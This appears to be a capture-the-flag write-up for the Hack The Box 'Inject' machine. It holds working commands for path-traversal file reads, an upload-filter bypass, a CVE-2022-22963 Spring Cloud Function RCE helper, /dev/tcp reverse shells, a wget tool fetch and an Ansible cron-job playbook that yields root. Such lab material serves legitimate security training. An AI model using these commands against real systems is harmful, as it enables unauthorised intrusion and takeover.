# Inject Write-Up
## Boot To Root
### Enumeration
Lets use Rustscan for initial enumeration
{% code fullWidth="true" %}
```bash
rustscan -n --ulimit 10000 --scan-order "Random" -a inject.htb -- -A -sC
```
{% endcode %}
{% code fullWidth="true" %}
```bash
**Output of RustScan
------------------**
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDKZNtFBY2xMX8oDH/EtIMngGHpVX5fyuJLp9ig7NIC9XooaPtK60FoxOLcRr4iccW/9L2GWpp6kT777UzcKtYoijOCtctNClc6tG1hvohEAyXeNunG7GN+Lftc8eb4C6DooZY7oSeO++PgK5oRi3/tg+FSFSi6UZCsjci1NRj/0ywqzl/ytMzq5YoGfzRzIN3HYdFF8RHoW8qs8vcPsEMsbdsy1aGRbslKA2l1qmejyU9cukyGkFjYZsyVj1hEPn9V/uVafdgzNOvopQlg/yozTzN+LZ2rJO7/CCK3cjchnnPZZfeck85k5sw1G5uVGq38qcusfIfCnZlsn2FZzP2BXo5VEoO2IIRudCgJWTzb8urJ6JAWc1h0r6cUlxGdOvSSQQO6Yz1MhN9omUD9r4A5ag4cbI09c1KOnjzIM8hAWlwUDOKlaohgPtSbnZoGuyyHV/oyZu+/1w4HJWJy6urA43u1PFTonOyMkzJZihWNnkHhqrjeVsHTywFPUmTODb8=
| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIUJSpBOORoHb6HHQkePUztvh85c2F5k5zMDp+hjFhD8VRC2uKJni1FLYkxVPc/yY3Km7Sg1GzTyoGUxvy+EIsg=
| 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICZzUvDL0INOklR7AH+iFw+uX+nkJtcw7V+1AsMO9P7p
8080/tcp open nagios-nsca syn-ack Nagios NSCA
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
{% endcode %}
As we can see there is not much we have in terms of open ports, lets see what’s on the other side of the website that is hosted on the machine.
homepage
From here we have only 2 options, one being **Signup** and other being **Upload** method.
While enumerating **Signup**, we have hit a dead end 😟
dead end
### Sub-Directory Enumeration
We are going to use feroxbuster for this job, I am using custom bash functions, so dont worry about the commands that I use in the screenshots.
Here is the command that you can actually use to do the sub-directory enumeration, make sure to replace the wordlist.txt with the one that you want to use
{% code fullWidth="true" %}
```bash
feroxbuster -s "200,204,301,302,307,308,401,405" -t "600" --timeout 15 -u http://inject.htb -w wordlist.txt -e -x php,html,txt,sql,bak,tar,tar.gz,db,zip,sqlite,ticket,docx,json,aspx,jsp,war --auto-tune
```
{% endcode %}
ferrox in action
Lets check the upload section
upload section
Try uploading any file, and you will get an error stating that only image files can be uploaded, however if you just change the extension of the file that can allow you to upload any file you want.
You don’t have to manipulate the magic number to bypass the verification system, just upload any file you want, and make sure to provide a .jpg extension.
However if you want to further enumerate the endpoint we can use any sample image file and try understand the path where it is being uploaded.
Lets try that.
uploaded the file
After uploading the file you will get a link, to view your file, click that and you will be taken to a new page.
And now notice the URL parameters that is being used.
check the url
### Local File Inclusion
Lets try enumerating for LFI
We can use **ffuf** for this
{% code fullWidth="true" %}
```bash
ffuf -w seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://target.local:8080/show_image\?img\=FUZZ -t 100 -c -fc 500,404
```
{% endcode %}
As we can see we have multiple hits
ffuf in action
we can use any one of them, lets try using curl and see what happens
{% code fullWidth="true" %}
```bash
curl http://inject.htb:8080/show_image\?img\=../../../../../../../../../../../../../../../../../../../etc/passwd
```
{% endcode %}
We can read the the contents of the /etc/passwd files now.
lfi exploitation
Lets check for the files in the Web root directory which is by default **/var/www**
/var/www
**Hmmm,** Looks like we have a Spring Boot Project, here.
The **pom.xml** file is a dependency list for the project, lets enumerate that
pom.xml
We have multiple dependencies here, lets enumerate the first one
The spring cloud function web 3.2.2 looks very interesting.
#### A quick google search for the exploit shall lead us to **spring4shell** exploit. Which has a **CVE-2022-22963**
[spring cloud function web 3.2.2 exploit - Google Search](https://www.google.com/search?q=spring+cloud+function+web+3.2.2+exploit\&ei=zdYlZMLoHJ7w4-EPvtKs4AU\&oq=spring+cloud+function+web+3.2.2+ex\&gs_lcp=Cgxnd3Mtd2l6LXNlcnAQAxgBMgUIIRCgATIFCCEQoAEyBQghEKABMgUIIRCgATIFCCEQoAEyBAghEBU6CwgAEIoFEIYDELADSgQIQRgBUNgEWNQHYMoYaAFwAHgAgAHDAYgB4AOSAQMwLjOYAQCgAQHIAQTAAQE\&sclient=gws-wiz-serp)
#### Exploit PoC
Using the knowledge from the PoC from github link we can craft out own bash function to make a more interactive exploit:
{% code fullWidth="true" %}
```bash
spring4Shell () {
if [[ -n "$1" && -n "$2" ]]; then
curl -X POST $1/functionRouter -H "spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec('$2')" --data-raw 'data' -v
else
usageHelp;
echo -e "[*] CVE-2022-22963 Spring4Shell"
echo -e "[*] Simple Remote Code Execution Exploit for Spring Cloud Function"
echo -e "[!] spring4Shell http://target.com:8080 "whoami '>' /tmp/pwned"\n"
fi
}
```
{% endcode %}
You can just copy and paste this function in your **.bashrc** or **.zshrc** or any aliases file that you are using and initialise it, or you can just start a new terminal session.
{% code fullWidth="true" %}
```bash
source ~/.bashrc
OR
source ~/.zshrc
OR
source ~/.bash_aliases
```
{% endcode %}
Once done we can start our exploitation phase.
***
## Exploitation
To get a shell we need to upload our reverse shell via the upload method we discovered earlier, however we don’t know where it is being uploaded, So to get that information we can simply use curl and make a request to get a file that does not exists.
{% code fullWidth="true" %}
```bash
curl http://inject.htb:8080/show_image\?img\=../../../../../../../../../../../../../../../../../../../var/www/WebApp/xyx
```
{% endcode %}
using curl
We have an Information Disclosure here, the error points out where the files are being uploaded
{% code fullWidth="true" %}
```bash
file:/var/www/WebApp/src/main/uploads/../.
```
{% endcode %}
lets craft our own reverse shell
{% code fullWidth="true" %}
```bash
echo -e '/bin/bash -i >& /dev/tcp/YOUR_HTB_IP/9999 0>&1' > evil.sh.jpg
```
{% endcode %}
And upload this to the server via the upload method
Now start a reverse shell handler in your terminal
{% code fullWidth="true" %}
```bash
nc -lvkp 9999
```
{% endcode %}
And then Execute it via the RCE Exploit, before you do that you might want to check if you are getting a ping request via the target or not
{% code fullWidth="true" %}
```bash
# First Setup TCPDump to listen for ping request
sudo tcpdump -i tun0 icmp
# Then execute a ping request from the target machine
spring4Shell http://target.local:8080 "ping -c 1 YOUR_HTB_IP"
```
{% endcode %}
open the shell
If all goes well, we can start to execute our reverse shell.
{% code fullWidth="true" %}
```bash
# You can check if the is uploaded or not via the curl command that we used earlier
curl http://target.local:8080/show_image\?img\=../../../../../../var/www/WebApp/src/main/uploads
# If the script got removed from the system you need to upload it again before exploting the RCE
# Once ready start the exploitation
spring4Shell http://target.local:8080 "chmod +x /var/www/WebApp/src/main/uploads/evil.sh.jpg"
spring4Shell http://target.local:8080 "bash -c /var/www/WebApp/src/main/uploads/evil.sh.jpg"
```
{% endcode %}
getting the shell
I have 2 separate windows open one to execute RCE and one to get the reverse shell.
{% code fullWidth="true" %}
```bash
# Get a better shell than a tty prompt
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=screen
```
{% endcode %}
***
## Privilege Escalation
First things first, try to get a better shell, for example as you are “frank” the current user, you can create an authroized\_keys file in the /home/frank/.ssh/ folder, if the .ssh folder does not exist create it. And upload your own public key that you can use to authenticate via the SSH.
Once that’s done, we can check the .m2 folder and check for the maven settings file which contains credentials
privesc
Escalate up to the other user **“phil”,** using the credentials mentioned in the settings.xml file
{% code fullWidth="true" %}
```bash
# Switch User to Phil
su phil
# Get the user flag
cd /home/phil
cat user.txt
```
{% endcode %}
So how do we escalate from here, lets use **pspy,** which you can upload via your own web server
{% code fullWidth="true" %}
```python
python -m http.server 69 DIRECTORY_WHERE_PSPY_IS_LOCATED/
# Then on the victim machine
wget http://YOUR_HTB_IP:69/pspy
chmod +x pspy
./pspy | tee report.txt
```
{% endcode %}
Via pspy we can see that there is a cron job running, which is executing ansible playbook files.
pspy in action
If we can inject our own playbook file we can get a root reverse shell.
We can use this template :
And edit the file and upload it to the **/opt/automation/tasks/evil.yml**
{% code fullWidth="true" %}
```bash
# Edit the file as per following, and make sure to provide your own HTB IP, do not copy this comment evil.yml
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/YOUR_HTB_IP/6969 0>&1'
```
{% endcode %}
As you can see I got root access after waiting for some time.
llisten for the call
get the flag
Thank you for reading my post, have a great rest of your day, and good hunting 😎
